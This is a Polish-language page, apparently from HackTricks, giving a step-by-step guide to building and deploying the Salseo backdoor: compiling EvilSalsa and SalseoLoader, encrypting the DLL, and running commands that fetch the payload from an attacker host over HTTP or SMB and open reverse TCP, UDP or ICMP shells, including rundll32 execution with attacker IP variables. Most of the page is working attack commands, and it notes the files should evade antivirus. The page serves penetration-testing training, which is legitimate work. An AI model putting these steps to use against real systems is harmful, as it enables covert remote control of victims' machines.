7.9 KiB
Salseo
{% hint style="success" %}
Naucz się i praktykuj Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Naucz się i praktykuj Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wesprzyj HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Udostępnij sztuczki hakerskie, przesyłając PR-y do HackTricks i HackTricks Cloud na githubie.
Kompilacja binarnych plików
Pobierz kod źródłowy z githuba i skompiluj EvilSalsa oraz SalseoLoader. Będziesz potrzebować zainstalowanego Visual Studio do skompilowania kodu.
Skompiluj te projekty dla architektury systemu Windows, na którym będziesz ich używać (jeśli Windows obsługuje x64, skompiluj je dla tej architektury).
Możesz wybrać architekturę wewnątrz Visual Studio w zakładce "Build" w "Platform Target".
(**Jeśli nie możesz znaleźć tych opcji, kliknij w "Project Tab", a następnie w "<Project Name> Properties")
Następnie zbuduj oba projekty (Build -> Build Solution) (W logach pojawi się ścieżka do pliku wykonywalnego):
Przygotuj Backdoor
Po pierwsze, będziesz musiał zakodować EvilSalsa.dll. Aby to zrobić, możesz użyć skryptu pythona encrypterassembly.py lub skompilować projekt EncrypterAssembly:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Ok, teraz masz wszystko, czego potrzebujesz do wykonania całej sprawy Salseo: zakodowany EvilDalsa.dll i binarny plik SalseoLoader.
Prześlij binarny plik SalseoLoader.exe na maszynę. Nie powinny być one wykrywane przez żadne AV...
Wykonaj backdoor
Uzyskiwanie odwrotnego powłoki TCP (pobieranie zakodowanego dll przez HTTP)
Pamiętaj, aby uruchomić nc jako nasłuchiwacz odwrotnej powłoki oraz serwer HTTP do obsługi zakodowanego evilsalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Uzyskiwanie odwrotnego powłoki UDP (pobieranie zakodowanego pliku dll przez SMB)
Pamiętaj, aby uruchomić nc jako nasłuchiwacz odwrotnej powłoki oraz serwer SMB do udostępniania zakodowanego pliku evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Uzyskiwanie odwrotnego powłoki ICMP (zakodowany plik DLL już w ofierze)
Tym razem potrzebujesz specjalnego narzędzia po stronie klienta, aby odebrać odwrotną powłokę. Pobierz: https://github.com/inquisb/icmpsh
Wyłącz odpowiedzi ICMP:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Wykonaj klienta:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
Wewnątrz ofiary, wykonajmy rzecz zwaną salseo:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Kompilowanie SalseoLoader jako DLL eksportujący funkcję główną
Otwórz projekt SalseoLoader za pomocą programu Visual Studio.
Dodaj przed funkcją główną: [DllExport]
Zainstaluj DllExport dla tego projektu
Narzędzia --> Menedżer pakietów NuGet --> Zarządzaj pakietami NuGet dla rozwiązania...
Wyszukaj pakiet DllExport (używając karty Przeglądaj) i naciśnij Zainstaluj (i zaakceptuj komunikat)
W folderze projektu pojawiły się pliki: DllExport.bat i DllExport_Configure.bat
Deinstalacja DllExport
Naciśnij Odinstaluj (tak, to dziwne, ale uwierz mi, to jest konieczne)
Zamknij Visual Studio i wykonaj DllExport_configure
Po prostu zamknij Visual Studio
Następnie przejdź do folderu SalseoLoader i wykonaj plik DllExport_Configure.bat
Wybierz x64 (jeśli zamierzasz użyć go wewnątrz systemu x64, tak było w moim przypadku), wybierz System.Runtime.InteropServices (wewnątrz Przestrzeń nazw dla DllExport) i naciśnij Zastosuj
Otwórz projekt ponownie w programie Visual Studio
[DllExport] nie powinno być już oznaczone jako błąd
Zbuduj rozwiązanie
Wybierz Typ wyjścia = Biblioteka klas (Projekt --> Właściwości SalseoLoader --> Aplikacja --> Typ wyjścia = Biblioteka klas)
Wybierz platformę x64 (Projekt --> Właściwości SalseoLoader --> Kompilacja --> Docelowa platforma = x64)
Aby zbudować rozwiązanie: Buduj --> Buduj rozwiązanie (W konsoli wyjściowej pojawi się ścieżka nowego pliku DLL)
Przetestuj wygenerowane Dll
Skopiuj i wklej plik DLL tam, gdzie chcesz go przetestować.
Wykonaj:
rundll32.exe SalseoLoader.dll,main
Jeśli nie pojawi się żadny błąd, prawdopodobnie masz działającą DLL!!
Uzyskaj powłokę, korzystając z DLL
Nie zapomnij użyć serwera HTTP i ustawić nasłuchiwacza nc
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
Wiersz poleceń
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
Ucz się i praktykuj Hacking AWS: HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i praktykuj Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wesprzyj HackTricks
- Sprawdź plany subskrypcji!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Udostępniaj sztuczki hakerskie, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.